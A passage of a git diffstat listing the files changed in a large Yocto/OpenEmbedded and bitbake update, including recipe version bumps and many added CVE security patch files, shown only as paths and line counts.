11 - .../recipes-dbs/postgresql/postgresql_12.9.bb | 11 + .../meta-oe/recipes-dbs/rocksdb/rocksdb_git.bb | 2 +- .../recipes-devtools/abseil-cpp/abseil-cpp_git.bb | 2 +- .../android-tools/android-tools_5.1.1.r37.bb | 1 + .../recipes-devtools/bootchart/bootchart_git.bb | 2 +- .../recipes-devtools/breakpad/breakpad_git.bb | 10 +- .../recipes-devtools/capnproto/capnproto_0.7.0.bb | 2 +- .../meta-oe/recipes-devtools/cjson/cjson_1.7.13.bb | 2 +- .../concurrencykit/concurrencykit_git.bb | 2 +- .../dnf-plugin-tui/dnf-plugin-tui_git.bb | 2 +- .../flatbuffers/flatbuffers_1.12.0.bb | 2 +- .../meta-oe/recipes-devtools/grpc/grpc_1.24.3.bb | 3 +- .../recipes-devtools/guider/guider_3.9.7.bb | 2 +- .../recipes-devtools/jsoncpp/jsoncpp_1.9.2.bb | 2 +- .../recipes-devtools/jsonrpc/jsonrpc_1.3.0.bb | 2 +- .../recipes-devtools/lapack/lapack_3.9.0.bb | 2 +- .../libsombok3/libsombok3_2.4.0.bb | 2 +- .../recipes-devtools/libubox/libubox_git.bb | 2 +- .../meta-oe/recipes-devtools/ltrace/ltrace_git.bb | 2 +- .../recipes-devtools/luaposix/luaposix_33.4.0.bb | 2 +- .../recipes-devtools/msgpack/msgpack-c_3.2.1.bb | 2 +- .../recipes-devtools/nanopb/nanopb_0.4.0.bb | 2 +- .../nlohmann-fifo/nlohmann-fifo_git.bb | 2 +- .../nlohmann-json/nlohmann-json_3.7.3.bb | 2 +- .../recipes-devtools/openocd/openocd_git.bb | 8 +- .../meta-oe/recipes-devtools/pcimem/pcimem_2.0.bb | 2 +- .../recipes-devtools/perl/ipc-run_20180523.0.bb | 2 +- .../perl/libdbd-mysql-perl_4.050.bb | 2 +- .../recipes-devtools/perl/libjson-perl_4.02000.bb | 2 +- .../meta-oe/recipes-devtools/ply/ply_git.bb | 2 +- .../recipes-devtools/pmtools/pmtools_git.bb | 2 +- .../recipes-devtools/protobuf/protobuf-c_1.3.3.bb | 2 +- .../recipes-devtools/protobuf/protobuf_3.11.4.bb | 2 +- .../recipes-devtools/rapidjson/rapidjson_git.bb | 2 +- .../serialcheck/serialcheck_1.0.0.bb | 2 +- .../recipes-devtools/sqlite-orm/sqlite-orm_1.5.bb | 2 +- .../meta-oe/recipes-devtools/tclap/tclap_1.2.2.bb | 2 +- .../recipes-devtools/uftrace/uftrace_0.9.4.bb | 2 +- .../recipes-devtools/valijson/valijson_git.bb | 2 +- .../recipes-devtools/xmlrpc-c/xmlrpc-c_1.51.03.bb | 2 +- .../meta-oe/recipes-devtools/yajl/yajl_1.0.12.bb | 2 +- .../meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb | 2 +- .../meta-oe/recipes-devtools/yasm/yasm_git.bb | 2 +- .../brotli/0001-brotli-fix-CVE-2020-8927.patch | 44 + .../recipes-extended/brotli/brotli_1.0.7.bb | 4 +- .../cmpi-bindings/cmpi-bindings_1.0.1.bb | 2 +- .../dlt-daemon/dlt-daemon/204.patch | 148 - .../dlt-daemon/dlt-daemon/275.patch | 38 - .../dlt-daemon/dlt-daemon/317.patch | 43 + .../dlt-daemon/dlt-daemon_2.18.4.bb | 63 - .../dlt-daemon/dlt-daemon_2.18.7.bb | 63 + .../recipes-extended/docopt.cpp/docopt.cpp_git.bb | 2 +- .../recipes-extended/dumb-init/dumb-init_1.2.2.bb | 2 +- .../meta-oe/recipes-extended/figlet/figlet_git.bb | 2 +- .../recipes-extended/haveged/haveged_1.9.13.bb | 2 +- .../recipes-extended/hexedit/hexedit_1.4.2.bb | 2 +- .../recipes-extended/hiredis/hiredis_0.14.0.bb | 2 +- .../meta-oe/recipes-extended/iotop/iotop_0.6.bb | 2 +- .../recipes-extended/isomd5sum/isomd5sum_1.2.3.bb | 2 +- .../recipes-extended/jansson/jansson_2.13.1.bb | 3 + .../jpnevulator/jpnevulator_git.bb | 2 +- .../konkretcmpi/konkretcmpi_0.9.2.bb | 2 +- .../libblockdev/libblockdev_2.24.bb | 2 +- .../meta-oe/recipes-extended/libcec/libcec_git.bb | 2 +- .../libdivecomputer/libdivecomputer_git.bb | 2 +- .../libimobiledevice/libplist_2.1.0.bb | 2 +- .../libimobiledevice/libusbmuxd_git.bb | 2 +- .../liblightmodbus/liblightmodbus_2.0.2.bb | 2 +- .../libnss-nisplus/libnss-nisplus.bb | 2 +- .../meta-oe/recipes-extended/libqb/libqb_1.0.5.bb | 2 +- .../recipes-extended/libreport/libreport_2.10.0.bb | 2 +- .../recipes-extended/libuio/libuio_0.2.1.bb | 2 +- .../recipes-extended/md5deep/md5deep_git.bb | 2 +- .../meta-oe/recipes-extended/mraa/mraa_git.bb | 2 +- .../recipes-extended/openwsman/openwsman_2.6.11.bb | 2 +- .../recipes-extended/ostree/ostree_2020.3.bb | 2 +- .../recipes-extended/p8platform/p8platform_git.bb | 2 +- .../recipes-extended/pam/pam-plugin-ccreds_11.bb | 2 +- .../recipes-extended/pam/pam-plugin-ldapdb_1.3.bb | 2 +- .../meta-oe/recipes-extended/pmdk/pmdk_1.7.bb | 2 +- .../meta-oe/recipes-extended/redis/redis_5.0.14.bb | 65 + .../meta-oe/recipes-extended/redis/redis_5.0.9.bb | 66 - .../recipes-extended/rrdtool/rrdtool_1.7.2.bb | 2 +- .../recipes-extended/rsyslog/libfastjson_0.99.8.bb | 2 +- .../recipes-extended/rsyslog/librelp_1.5.0.bb | 2 +- .../recipes-extended/sanlock/sanlock_3.8.0.bb | 2 +- .../recipes-extended/sedutil/sedutil_git.bb | 2 +- .../recipes-extended/socketcan/can-isotp_git.bb | 2 +- .../recipes-extended/socketcan/can-utils_git.bb | 2 +- .../recipes-extended/socketcan/canutils_4.0.6.bb | 2 +- .../socketcan/libsocketcan_0.0.11.bb | 2 +- .../meta-oe/recipes-extended/sysdig/sysdig_git.bb | 2 +- .../recipes-extended/tipcutils/tipcutils_git.bb | 2 +- .../triggerhappy/triggerhappy_git.bb | 2 +- .../meta-oe/recipes-extended/upm/upm_git.bb | 2 +- .../meta-oe/recipes-extended/wipe/wipe_0.24.bb | 2 +- .../recipes-extended/wxwidgets/wxwidgets_git.bb | 2 +- .../meta-oe/recipes-extended/zlog/zlog_1.2.14.bb | 2 +- .../meta-oe/recipes-extended/zstd/zstd_1.4.5.bb | 2 +- .../meta-oe/recipes-gnome/pyxdg/pyxdg_0.26.bb | 2 +- .../recipes-graphics/dietsplash/dietsplash_git.bb | 2 +- .../recipes-graphics/dnfdragora/dnfdragora_git.bb | 2 +- .../recipes-graphics/fbgrab/fbgrab_1.3.3.bb | 2 +- .../fontforge/fontforge_20190801.bb | 2 +- .../meta-oe/recipes-graphics/fvwm/fvwm_2.6.9.bb | 2 +- .../meta-oe/recipes-graphics/glm/glm_0.9.9.6.bb | 2 +- .../recipes-graphics/graphviz/graphviz_2.40.1.bb | 2 +- .../recipes-graphics/jasper/jasper_2.0.16.bb | 2 +- .../libvncserver/libvncserver_0.9.12.bb | 2 +- .../libyui/libyui-ncurses_2.52.0.bb | 2 +- .../recipes-graphics/libyui/libyui_3.6.0.bb | 2 +- .../recipes-graphics/openjpeg/openjpeg_2.3.1.bb | 2 +- .../recipes-graphics/qrencode/qrencode_git.bb | 2 +- .../recipes-graphics/renderdoc/renderdoc_1.7.bb | 2 +- .../spir/spirv-shader-generator_git.bb | 2 +- .../recipes-graphics/spir/spirv-tools_git.bb | 11 +- .../tesseract/tesseract-lang_4.0.0.bb | 2 +- .../recipes-graphics/tesseract/tesseract_git.bb | 2 +- .../recipes-graphics/tigervnc/tigervnc_1.10.1.bb | 2 +- .../recipes-graphics/ttf-fonts/ttf-droid_git.bb | 2 +- .../recipes-graphics/ttf-fonts/ttf-lohit_2.bb | 2 +- .../ttf-fonts/ttf-noto-emoji_20190815.bb | 2 +- .../unclutter-xfixes/unclutter-xfixes_1.5.bb | 2 +- .../meta-oe/recipes-graphics/vdpau/libvdpau_1.3.bb | 2 +- .../recipes-graphics/x11vnc/x11vnc_0.9.16.bb | 2 +- .../xorg-app/xterm/CVE-2021-27135.patch | 68 + .../meta-oe/recipes-graphics/xorg-app/xterm_353.bb | 1 + .../xorg-driver/xf86-video-armsoc_1.4.1.bb | 2 +- .../meta-oe/recipes-graphics/yad/yad_6.0.bb | 2 +- .../recipes-kernel/agent-proxy/agent-proxy_1.97.bb | 2 +- .../broadcom-bt-firmware_git.bb | 2 +- .../meta-oe/recipes-kernel/crash/crash_7.2.8.bb | 2 +- .../meta-oe/recipes-kernel/kpatch/kpatch.inc | 2 +- .../minicoredumper/minicoredumper_2.0.1.bb | 2 +- .../recipes-kernel/pm-graph/pm-graph_5.5.bb | 2 +- .../meta-oe/recipes-multimedia/jack/a2jmidid_9.bb | 2 +- .../recipes-multimedia/jack/jack_1.19.14.bb | 2 +- .../recipes-multimedia/libass/libass_0.14.0.bb | 2 +- .../recipes-multimedia/mplayer/mpv_0.32.0.bb | 2 +- .../pipewire/pipewire-0.2_git.bb | 2 +- .../recipes-multimedia/pipewire/pipewire_git.bb | 2 +- .../recipes-multimedia/v4l2apps/yavta_git.bb | 2 +- .../recipes-multimedia/webm/libvpx_1.8.2.bb | 2 +- .../recipes-security/keyutils/keyutils_1.6.1.bb | 15 +- .../recipes-security/softhsm/softhsm_git.bb | 2 +- .../ace-cloud-editor/ace-cloud-editor_git.bb | 2 +- .../meta-oe/recipes-support/avro/avro-c_1.9.2.bb | 2 +- .../meta-oe/recipes-support/bdwgc/bdwgc_8.0.4.bb | 2 +- ..._name-fix-formatting-and-handling-of-root.patch | 115 + ...expand_name-should-escape-more-characters.patch | 90 + .../recipes-support/c-ares/c-ares_1.16.0.bb | 27 - .../recipes-support/c-ares/c-ares_1.16.1.bb | 29 + .../ceres-solver/ceres-solver_1.14.0.bb | 2 +- .../meta-oe/recipes-support/cli11/cli11_1.9.1.bb | 2 +- .../meta-oe/recipes-support/cmark/cmark_git.bb | 2 +- .../recipes-support/daemonize/daemonize_git.bb | 2 +- .../recipes-support/digitemp/digitemp_3.7.2.bb | 2 +- .../meta-oe/recipes-support/dstat/dstat_0.7.4.bb | 4 +- .../meta-oe/recipes-support/epeg/epeg_git.bb | 2 +- .../meta-oe/recipes-support/fmt/fmt_6.2.0.bb | 2 +- .../meta-oe/recipes-support/freerdp/freerdp_git.bb | 2 +- .../recipes-support/function2/function2_4.0.0.bb | 2 +- .../meta-oe/recipes-support/gd/gd_2.3.0.bb | 2 +- .../meta-oe/recipes-support/gflags/gflags_2.2.2.bb | 2 +- .../meta-oe/recipes-support/glog/glog_0.3.5.bb | 2 +- .../recipes-support/gnulib/gnulib_2018-03-07.03.bb | 2 +- .../gperftools/gperftools_2.7.90.bb | 2 +- .../meta-oe/recipes-support/gpm/gpm_git.bb | 2 +- .../meta-oe/recipes-support/hidapi/hidapi_git.bb | 2 +- .../hunspell/hunspell-dictionaries.bb | 2 +- .../recipes-support/hunspell/hunspell_1.7.0.bb | 2 +- .../meta-oe/recipes-support/hwdata/hwdata_git.bb | 2 +- .../meta-oe/recipes-support/iksemel/iksemel_1.5.bb | 2 +- .../imagemagick/imagemagick_7.0.9.bb | 2 +- .../meta-oe/recipes-support/inih/libinih_git.bb | 2 +- .../recipes-support/iniparser/iniparser_4.1.bb | 2 +- .../inotify-tools/inotify-tools_git.bb | 2 +- .../libatasmart/libatasmart_0.19.bb | 2 +- .../recipes-support/libbytesize/libbytesize_2.2.bb | 2 +- .../recipes-support/libcereal/libcereal_1.3.0.bb | 2 +- .../libcyusbserial/libcyusbserial_git.bb | 2 +- .../meta-oe/recipes-support/libfann/libfann_git.bb | 2 +- .../recipes-support/libgit2/libgit2_0.28.4.bb | 2 +- .../meta-oe/recipes-support/libgusb/libgusb_git.bb | 2 +- .../recipes-support/libharu/libharu_2.3.0.bb | 2 +- .../meta-oe/recipes-support/libiio/libiio_git.bb | 2 +- .../libmicrohttpd/CVE-2021-3466.patch | 158 + .../libmicrohttpd/libmicrohttpd_0.9.70.bb | 3 +- .../recipes-support/libmimetic/libmimetic_0.9.8.bb | 2 +- .../meta-oe/recipes-support/libmxml/libmxml_3.1.bb | 2 +- .../recipes-support/libp11/libp11_0.4.10.bb | 2 +- .../recipes-support/librsync/librsync_2.3.1.bb | 2 +- .../meta-oe/recipes-support/libsoc/libsoc_0.8.2.bb | 2 +- .../recipes-support/libteam/libteam_1.30.bb | 2 +- .../libtinyxml2/libtinyxml2_8.0.0.bb | 2 +- .../meta-oe/recipes-support/libusbg/libusbg_git.bb | 2 +- .../recipes-support/libusbgx/libusbgx_git.bb | 2 +- .../recipes-support/libutempter/libutempter.bb | 2 +- .../recipes-support/lio-utils/lio-utils_4.1.bb | 2 +- .../meta-oe/recipes-support/lvm2/lvm2.inc | 2 +- .../recipes-support/mcelog/mce-inject_git.bb | 2 +- .../meta-oe/recipes-support/mcelog/mce-test_git.bb | 2 +- .../meta-oe/recipes-support/mcelog/mcelog_168.bb | 2 +- .../multipath-tools/multipath-tools_0.8.4.bb | 2 +- .../meta-oe/recipes-support/ne10/ne10_1.2.1.bb | 2 +- .../recipes-support/nss/nss/CVE-2020-12403_1.patch | 65 + .../recipes-support/nss/nss/CVE-2020-12403_2.patch | 80 + .../nss/nss/CVE-2020-6829_12400.patch | 19789 +++++++++++++++++++ .../recipes-support/nss/nss/CVE-2021-43527.patch | 283 + .../meta-oe/recipes-support/nss/nss_3.51.1.bb | 4 + .../meta-oe/recipes-support/numactl/numactl_git.bb | 2 +- .../open-vm-tools/open-vm-tools_11.0.1.bb | 2 +- .../recipes-support/opencl/clinfo_2.2.18.04.06.bb | 2 +- .../meta-oe/recipes-support/opencv/ade_0.1.1f.bb | 2 +- .../meta-oe/recipes-support/opencv/opencv_4.1.0.bb | 12 +- .../recipes-support/opensc/opensc_0.20.0.bb | 2 +- .../meta-oe/recipes-support/picocom/picocom_git.bb | 2 +- .../pidgin/funyahoo-plusplus_git.bb | 2 +- .../meta-oe/recipes-support/pidgin/icyque_git.bb | 2 +- .../recipes-support/pidgin/purple-skypeweb_git.bb | 2 +- .../meta-oe/recipes-support/poco/poco_1.9.4.bb | 2 +- .../recipes-support/pps-tools/pps-tools_1.0.2.bb | 2 +- .../recipes-support/remmina/remmina_1.3.6.bb | 2 +- .../recipes-support/rsnapshot/rsnapshot_git.bb | 2 +- .../meta-oe/recipes-support/sass/libsass_3.6.3.bb | 2 +- .../meta-oe/recipes-support/sass/sassc_git.bb | 2 +- .../meta-oe/recipes-support/satyr/satyr_0.28.bb | 2 +- .../serial-utils/pty-forward-native.bb | 2 +- .../serial-utils/serial-forward_git.bb | 2 +- .../recipes-support/span-lite/span-lite_git.bb | 2 +- .../meta-oe/recipes-support/spdlog/spdlog_1.5.0.bb | 2 +- .../recipes-support/spitools/spitools_git.bb | 2 +- .../thin-provisioning-tools_0.8.5.bb | 2 +- .../recipes-support/toscoterm/toscoterm_git.bb | 2 +- .../meta-oe/recipes-support/udisks/udisks2_git.bb | 2 +- .../recipes-support/uhubctl/uhubctl_2.1.0.bb | 2 +- .../meta-oe/recipes-support/uthash/uthash_2.1.0.bb | 2 +- .../recipes-support/utouch/utouch-evemu_git.bb | 2 +- .../recipes-support/utouch/utouch-frame_git.bb | 2 +- .../recipes-support/utouch/utouch-mtview_git.bb | 2 +- .../websocketpp/websocketpp_0.8.2.bb | 2 +- .../recipes-support/xdelta/xdelta3_3.1.0.bb | 2 +- .../recipes-support/xorg-xrdp/xorgxrdp_0.2.5.bb | 2 +- .../meta-oe/recipes-support/xrdp/xrdp_0.9.11.bb | 2 +- .../meta-oe/recipes-support/xxhash/xxhash_0.7.3.bb | 2 +- .../meta-oe/recipes-support/zbar/zbar_git.bb | 2 +- .../meta-oe/recipes-support/zchunk/zchunk_1.1.6.bb | 2 +- .../meta-oe/recipes-test/bats/bats_1.1.0.bb | 2 +- .../meta-oe/recipes-test/catch2/catch2_2.9.2.bb | 2 +- .../meta-oe/recipes-test/evtest/evtest_1.34.bb | 2 +- .../meta-oe/recipes-test/fbtest/fb-test_git.bb | 2 +- .../recipes-test/googletest/googletest_git.bb | 2 +- .../meta-oe/recipes-test/pm-qa/pm-qa_git.bb | 3 +- .../meta-perl/recipes-perl/po4a/po4a_0.49.bb | 2 +- .../python-txws/python3-txws_0.9.1.bb | 2 +- .../meta-python/recipes-devtools/gyp/gyp.inc | 2 +- .../python/python-feedformatter.inc | 2 +- .../recipes-devtools/python/python3-absl_0.7.0.bb | 2 +- .../recipes-devtools/python/python3-astor_0.8.1.bb | 2 +- .../python/python3-dbussy_1.2.1.bb | 2 +- .../python/python3-dt-schema_git.bb | 2 +- .../python/python3-fasteners_0.15.bb | 9 - .../python/python3-fasteners_0.16.3.bb | 14 + .../recipes-devtools/python/python3-gast_0.2.2.bb | 2 +- .../recipes-devtools/python/python3-h5py_2.9.0.bb | 2 +- .../python/python3-imageio_2.6.0.bb | 2 +- .../python/python3-keras-applications_1.0.8.bb | 2 +- .../python/python3-keras-preprocessing_1.1.0.bb | 2 +- .../python/python3-langtable_0.0.38.bb | 2 +- .../python/python3-pillow_6.2.1.bb | 2 +- .../python/python3-pkgconfig_1.4.0.bb | 2 +- .../recipes-devtools/python/python3-prctl_1.7.bb | 2 +- .../python/python3-wheel_0.33.6.bb | 2 +- .../python-blivet/python3-blivet_3.1.4.bb | 2 +- .../python-blivet/python3-blivetgui_2.1.10.bb | 2 +- .../python-cson/python3-cson_git.bb | 2 +- .../python-pyparted/python-pyparted.inc | 2 +- .../apache-mod/apache-websocket_git.bb | 2 +- .../apache2/apache2/CVE-2020-13950.patch | 45 - .../apache2/apache2/CVE-2020-35452.patch | 49 - .../apache2/apache2/CVE-2021-26690.patch | 39 - .../apache2/apache2/CVE-2021-26691.patch | 35 - .../apache2/apache2/CVE-2021-30641.patch | 66 - .../recipes-httpd/apache2/apache2_2.4.46.bb | 231 - .../recipes-httpd/apache2/apache2_2.4.51.bb | 225 + .../recipes-httpd/cherokee/cherokee_git.bb | 2 +- .../recipes-httpd/sthttpd/sthttpd_2.27.1.bb | 2 +- .../recipes-support/fcgi/fcgi_git.bb | 2 +- .../recipes-webadmin/netdata/netdata_git.bb | 2 +- .../recipes-apps/xarchiver/xarchiver_git.bb | 2 +- .../recipes-apps/xfce-polkit/xfce-polkit_0.3.bb | 2 +- .../xfce4-datetime-setter_3.32.2.bb | 2 +- .../closebutton/xfce4-closebutton-plugin_git.bb | 2 +- .../recipes-bsp/bootfiles/rpi-config_git.bb | 2 +- .../pi-bluetooth/pi-bluetooth_0.1.12.bb | 2 +- .../recipes-core/udev/udev-rules-rpi/99-com.rules | 8 +- .../recipes-devtools/pi-blaster/pi-blaster_git.bb | 2 +- .../recipes-devtools/python/python3-rtimu_git.bb | 2 +- .../recipes-graphics/userland/userland_git.bb | 2 +- .../bluez-firmware-rpidistro_git.bb | 2 +- .../linux-firmware-rpidistro_git.bb | 2 +- .../recipes-kernel/linux/linux-raspberrypi-dev.bb | 2 +- .../recipes-multimedia/omxplayer/omxplayer_git.bb | 4 +- .../recipes-kernel/linux/linux-%_5.%.bbappend | 4 - poky/README.OE-Core | 10 +- poky/bitbake/bin/bitbake-worker | 14 +- poky/bitbake/lib/bb/build.py | 19 +- poky/bitbake/lib/bb/command.py | 16 +- poky/bitbake/lib/bb/compat.py | 10 - poky/bitbake/lib/bb/cooker.py | 10 +- poky/bitbake/lib/bb/cookerdata.py | 14 +- poky/bitbake/lib/bb/data_smart.py | 6 +- poky/bitbake/lib/bb/event.py | 16 +- poky/bitbake/lib/bb/fetch2/git.py | 25 +- poky/bitbake/lib/bb/fetch2/wget.py | 2 +- poky/bitbake/lib/bb/msg.py | 6 - poky/bitbake/lib/bb/persist_data.py | 13 +- poky/bitbake/lib/bb/process.py | 3 + poky/bitbake/lib/bb/runqueue.py | 4 +- poky/bitbake/lib/bb/server/process.py | 12 +- poky/bitbake/lib/bb/tests/event.py | 17 +- poky/bitbake/lib/bb/tests/fetch.py | 41 +- poky/bitbake/lib/bb/tinfoil.py | 11 +- poky/bitbake/lib/bb/ui/knotty.py | 21 +- poky/bitbake/lib/bb/ui/taskexp.py | 5 + poky/bitbake/lib/bb/utils.py | 7 +- poky/bitbake/lib/bblayers/action.py | 4 +- poky/bitbake/lib/bblayers/query.py | 8 +- poky/bitbake/lib/hashserv/server.py | 23 +- poky/bitbake/lib/layerindexlib/__init__.py | 1 - poky/documentation/conf.py | 5 +- poky/documentation/poky.yaml | 13 +- poky/documentation/ref-manual/migration-3.0.rst | 3 +- .../ref-manual/ref-system-requirements.rst | 4 + poky/documentation/ref-manual/ref-tasks.rst | 19 +- poky/documentation/releases.rst | 84 +- poky/documentation/sphinx-static/switchers.js | 7 +- poky/meta-poky/conf/distro/poky.conf | 6 +- .../devtool/devtool-upgrade-test2_git.bb | 2 +- .../devtool/devtool-upgrade-test2_git.bb.upgraded | 2 +- .../recipes-kernel/linux/linux-yocto_5.4.bbappend | 8 +- poky/meta/classes/base.bbclass | 12 +- poky/meta/classes/buildhistory.bbclass | 30 +- poky/meta/classes/cve-check.bbclass | 3 +- poky/meta/classes/devtool-source.bbclass | 4 +- poky/meta/classes/devupstream.bbclass | 2 +- poky/meta/classes/externalsrc.bbclass | 9 + poky/meta/classes/image_types.bbclass | 2 +- poky/meta/classes/libc-package.bbclass | 2 +- poky/meta/classes/license.bbclass | 4 + poky/meta/classes/mirrors.bbclass | 3 +- poky/meta/classes/package.bbclass | 6 +- poky/meta/classes/package_deb.bbclass | 4 +- poky/meta/classes/package_ipk.bbclass | 3 +- poky/meta/classes/package_rpm.bbclass | 3 +- poky/meta/classes/patch.bbclass | 7 +- poky/meta/classes/populate_sdk_base.bbclass | 1 + poky/meta/classes/reproducible_build.bbclass | 83 +- poky/meta/classes/rm_work.bbclass | 8 +- poky/meta/classes/sstate.bbclass | 45 +- poky/meta/classes/testimage.bbclass | 19 +- poky/meta/classes/uninative.bbclass | 2 +- poky/meta/classes/useradd.bbclass | 4 + poky/meta/classes/utils.bbclass | 2 +- poky/meta/conf/bitbake.conf | 6 +- .../conf/distro/include/cve-extra-exclusions.inc | 13 +- .../conf/distro/include/default-distrovars.inc | 2 +- poky/meta/conf/distro/include/maintainers.inc | 3 +- poky/meta/conf/distro/include/yocto-uninative.inc | 10 +- poky/meta/conf/layer.conf | 2 +- poky/meta/conf/multilib.conf | 2 + poky/meta/files/common-licenses/Unlicense | 24 + poky/meta/files/toolchain-shar-extract.sh | 3 +- poky/meta/files/toolchain-shar-relocate.sh | 2 +- poky/meta/lib/buildstats.py | 4 +- poky/meta/lib/oe/license.py | 6 + poky/meta/lib/oe/reproducible.py | 2 +- poky/meta/lib/oe/utils.py | 3 +- poky/meta/lib/oeqa/core/target/ssh.py | 1 + poky/meta/lib/oeqa/manual/eclipse-plugin.json | 6 +- poky/meta/lib/oeqa/runtime/cases/ksample.py | 2 +- poky/meta/lib/oeqa/runtime/cases/parselogs.py | 19 +- poky/meta/lib/oeqa/runtime/context.py | 29 +- poky/meta/lib/oeqa/selftest/cases/bbtests.py | 5 +- poky/meta/lib/oeqa/selftest/cases/devtool.py | 9 +- .../lib/oeqa/selftest/cases/diffoscope/A/file.txt | 1 + .../lib/oeqa/selftest/cases/diffoscope/B/file.txt | 1 + poky/meta/lib/oeqa/selftest/cases/gotoolchain.py | 6 + poky/meta/lib/oeqa/selftest/cases/imagefeatures.py | 2 +- poky/meta/lib/oeqa/selftest/cases/recipetool.py | 6 +- poky/meta/lib/oeqa/selftest/cases/reproducible.py | 32 +- poky/meta/lib/oeqa/selftest/cases/runtime_test.py | 7 + poky/meta/lib/oeqa/selftest/cases/sstatetests.py | 14 +- poky/meta/lib/oeqa/selftest/cases/tinfoil.py | 10 +- poky/meta/lib/oeqa/utils/buildproject.py | 3 + poky/meta/lib/oeqa/utils/qemurunner.py | 9 +- poky/meta/lib/oeqa/utils/targetbuild.py | 4 +- poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb | 2 +- poky/meta/recipes-bsp/efivar/efivar_37.bb | 2 +- .../recipes-bsp/grub/files/CVE-2020-14372.patch | 76 + .../recipes-bsp/grub/files/CVE-2020-14372_1.patch | 130 + .../recipes-bsp/grub/files/CVE-2020-14372_2.patch | 431 + .../recipes-bsp/grub/files/CVE-2020-14372_3.patch | 57 + .../recipes-bsp/grub/files/CVE-2020-14372_4.patch | 52 + .../recipes-bsp/grub/files/CVE-2020-14372_5.patch | 158 + .../recipes-bsp/grub/files/CVE-2020-27779.patch | 70 + .../recipes-bsp/grub/files/CVE-2020-27779_2.patch | 105 + .../recipes-bsp/grub/files/CVE-2020-27779_3.patch | 37 + .../recipes-bsp/grub/files/CVE-2020-27779_4.patch | 35 + .../recipes-bsp/grub/files/CVE-2020-27779_5.patch | 62 + .../recipes-bsp/grub/files/CVE-2020-27779_6.patch | 61 + .../recipes-bsp/grub/files/CVE-2020-27779_7.patch | 65 + .../recipes-bsp/grub/files/no-insmod-on-sb.patch | 107 + poky/meta/recipes-bsp/grub/grub2.inc | 14 + ...ss-compilation-using-autoconf-detected-AR.patch | 36 + poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb | 1 + poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb | 2 +- poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb | 2 +- poky/meta/recipes-bsp/u-boot/u-boot-common.inc | 2 +- .../meta/recipes-connectivity/bind/bind_9.11.32.bb | 141 - .../meta/recipes-connectivity/bind/bind_9.11.35.bb | 141 + poky/meta/recipes-connectivity/bluez5/bluez5.inc | 1 + .../bluez5/bluez5/CVE-2021-0129.patch | 109 + .../connman/connman-gnome_0.7.bb | 2 +- poky/meta/recipes-connectivity/connman/connman.inc | 2 + .../inetutils/inetutils/CVE-2021-40491.patch | 67 + .../inetutils/inetutils_1.9.4.bb | 1 + .../libnss-mdns/libnss-mdns_0.14.1.bb | 2 +- .../mobile-broadband-provider-info_git.bb | 2 +- .../openssh/openssh/CVE-2021-28041.patch | 20 + .../openssh/openssh/CVE-2021-41617.patch | 52 + .../recipes-connectivity/openssh/openssh_8.2p1.bb | 13 +- .../openssl/openssl/reproducibility.patch | 22 + .../recipes-connectivity/openssl/openssl_1.1.1k.bb | 217 - .../recipes-connectivity/openssl/openssl_1.1.1l.bb | 218 + .../resolvconf/resolvconf_1.82.bb | 2 +- .../busybox/busybox/CVE-2021-42374.patch | 53 + .../busybox/busybox/CVE-2021-42376.patch | 138 + poky/meta/recipes-core/busybox/busybox_1.31.1.bb | 3 + .../busybox/files/CVE-2021-423xx-awk.patch | 215 + poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb | 2 +- poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb | 90 - poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb | 64 + poky/meta/recipes-core/dbus/dbus.inc | 34 + .../recipes-core/dbus/dbus/CVE-2020-12049.patch | 78 - poky/meta/recipes-core/dbus/dbus_1.12.16.bb | 177 - poky/meta/recipes-core/dbus/dbus_1.12.20.bb | 147 + poky/meta/recipes-core/dropbear/dropbear.inc | 4 +- .../dropbear/dropbear/CVE-2020-36254.patch | 29 + .../recipes-core/expat/expat/CVE-2021-45960.patch | 65 + .../recipes-core/expat/expat/CVE-2021-46143.patch | 43 + .../expat/expat/CVE-2022-22822-27.patch | 257 + poky/meta/recipes-core/expat/expat_2.2.9.bb | 7 +- poky/meta/recipes-core/fts/fts_1.2.7.bb | 2 +- .../glib-2.0/glib-2.0/CVE-2021-27218.patch | 129 + .../glib-2.0/glib-2.0/CVE-2021-27219-01.patch | 170 + .../glib-2.0/glib-2.0/CVE-2021-27219-02.patch | 249 + .../glib-2.0/glib-2.0/CVE-2021-27219-03.patch | 131 + .../glib-2.0/glib-2.0/CVE-2021-27219-04.patch | 298 + .../glib-2.0/glib-2.0/CVE-2021-27219-05.patch | 54 + .../glib-2.0/glib-2.0/CVE-2021-27219-06.patch | 101 + .../glib-2.0/glib-2.0/CVE-2021-27219-07.patch | 76 + .../glib-2.0/glib-2.0/CVE-2021-27219-08.patch | 101 + .../glib-2.0/glib-2.0/CVE-2021-27219-09.patch | 100 + .../glib-2.0/glib-2.0/CVE-2021-27219-10.patch | 59 + .../glib-2.0/glib-2.0/CVE-2021-27219-11.patch | 63 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch | 36 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch | 38 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch | 38 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch | 100 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch | 49 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch | 43 + .../glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch | 232 + .../glib-2.0/glib-2.0/CVE-2021-28153-1.patch | 27 + .../glib-2.0/glib-2.0/CVE-2021-28153-2.patch | 42 + .../glib-2.0/glib-2.0/CVE-2021-28153-3.patch | 57 + .../glib-2.0/glib-2.0/CVE-2021-28153-4.patch | 265 + .../glib-2.0/glib-2.0/CVE-2021-28153-5.patch | 55 + poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb | 24 + .../glibc/cross-localedef-native_2.31.bb | 2 +- ...l_update-slotinfo-to-avoid-use-after-free.patch | 66 + ...in-pthread_create-and-TLS-access-BZ-19329.patch | 191 + ...elaxed-atomics-for-racy-accesses-BZ-19329.patch | 206 + .../0033-elf-Add-test-case-for-BZ-19329.patch | 144 + ...0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch | 180 + 